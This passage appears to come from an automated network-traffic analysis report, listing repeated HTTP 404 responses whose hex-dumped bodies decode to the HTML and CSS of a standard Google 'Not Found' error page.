70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 